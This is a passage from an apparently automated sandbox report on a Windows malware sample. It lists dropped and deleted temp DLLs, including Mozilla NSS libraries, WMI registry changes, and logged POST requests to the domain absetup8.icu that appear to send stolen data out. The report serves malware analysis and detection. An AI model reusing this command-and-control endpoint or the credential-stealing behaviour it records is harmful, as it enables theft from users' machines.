777 "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
778 "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
779 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
780 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER"
781
782
783* Deleted Files:
784 "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp",
785 "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp",
786 "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp",
787 "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp",
788 "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp",
789 "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
790 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
791 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
792 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
793 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
794 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
795 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
796 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
797 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
798 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
799 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
800 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
801 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
802 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
803 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
804 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
805 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
806 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
807 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
808 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
809 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
810 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
811 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
812 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
813 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
814 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
815 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
816 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
817 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
818 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
819 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
820 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
821 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
822 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
823 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
824 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
825 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
826 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
827 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
828 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
829 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
830 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
831 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
832 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
833 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
834 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
835 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
836 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
837 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
838 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
839 "C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe"
840
841
842* Modified Registry Keys:
843 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
844 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
845 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
846 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
847 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
848 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
849 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
850 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
851 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
852 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
853 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
854 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
855 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
856 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
857
858
859* Deleted Registry Keys:
860
861* DNS Communications:
862
863 "type": "A",
864 "request": "absetup8.icu",
865 "answers":
866
867 "data": "47.252.1.254",
868 "type": "A"
869
870
871
872
873
874* Domains:
875
876 "ip": "47.252.1.254",
877 "domain": "absetup8.icu"
878
879
880
881* Network Communication - ICMP:
882
883* Network Communication - HTTP:
884
885 "count": 1,
886 "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
887 "uri": "http://absetup8.icu/index.php",
888 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
889 "method": "POST",
890 "host": "absetup8.icu",
891 "version": "1.1",
892 "path": "/index.php",
893 "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: absetup8.icu\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
894 "port": 80
895
896
897 "count": 1,
898 "body": "",
899 "uri": "http://absetup8.icu/index.php",
900 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
901 "method": "POST",
902 "host": "absetup8.icu",
903 "version": "1.1",
904 "path": "/index.php",
905 "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: absetup8.icu\r\nContent-Length: 66393\r\nCache-Control: no-cache\r\n\r\n",
906 "port": 80
907
908
909
910* Network Communication - SMTP:
911
912* Network Communication - Hosts:
913
914 "country_name": "United States",
915 "ip": "47.252.1.254",
916 "inaddrarpa": "",
917 "hostname": "absetup8.icu"
918
919
920
921* Network Communication - IRC: